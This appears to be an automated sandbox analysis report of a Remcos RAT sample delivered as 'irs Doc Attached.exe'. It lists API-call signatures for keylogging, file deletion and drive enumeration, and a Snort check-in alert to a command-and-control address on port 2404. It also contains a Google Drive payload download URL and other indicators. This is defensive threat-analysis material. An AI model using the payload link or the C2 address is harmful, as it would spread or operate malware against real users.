Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_10538BE3 getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,2_2_10538BE3
Source: C:\Users\Public\Kaphkos.exe; Code function: 12_2_00404298 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404298
Source: C:\Users\Public\Kaphkos.exe; Code function: 14_2_00404298 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_00404298
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0018740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,16_2_0018740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_001904E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@
std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t16_2_001904E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_00187183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, | 16_2_00187183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_00184648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA | 16_2_00184648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_001926D3 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, | 16_2_001926D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_00184AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, | 16_2_00184AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 16_2_00183315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, | 16_2_00183315
Contains functionality to query local drives
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha | 2_2_00403B9A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2026019 ET TROJAN Win32/Remcos RAT Checkin 29 192.168.2.5:49749 -> 185.140.53.207:2404
Contains functionality to download and execute PE files
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_1053EE87 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z, | 2_2_1053EE87
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.5:49749 -> 185.140.53.207:2404
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 216.58.215.225 216.58.215.225
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Contains functionality to download additional files from the internet
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_00402139 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, | 2_2_00402139
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: doc-14-5k-docs.googleusercontent.com
Urls found in memory or binary data
Source: irs Doc Attached.exe | String found in binary or memory: https://drive.google.com/u/0/uc?id=1DVOxPIxWDKsRfVKPkR-5uTr9f2K9poRF&export=download
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to capture and log keystrokes
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Esc] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Enter] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Tab] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Down] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Right] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Up] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Left] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [End] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F2] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F1] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Esc] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Enter] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Tab] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Down] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Right] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Up] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Left] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [End] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F2] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F1] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 16_2_00185DA6
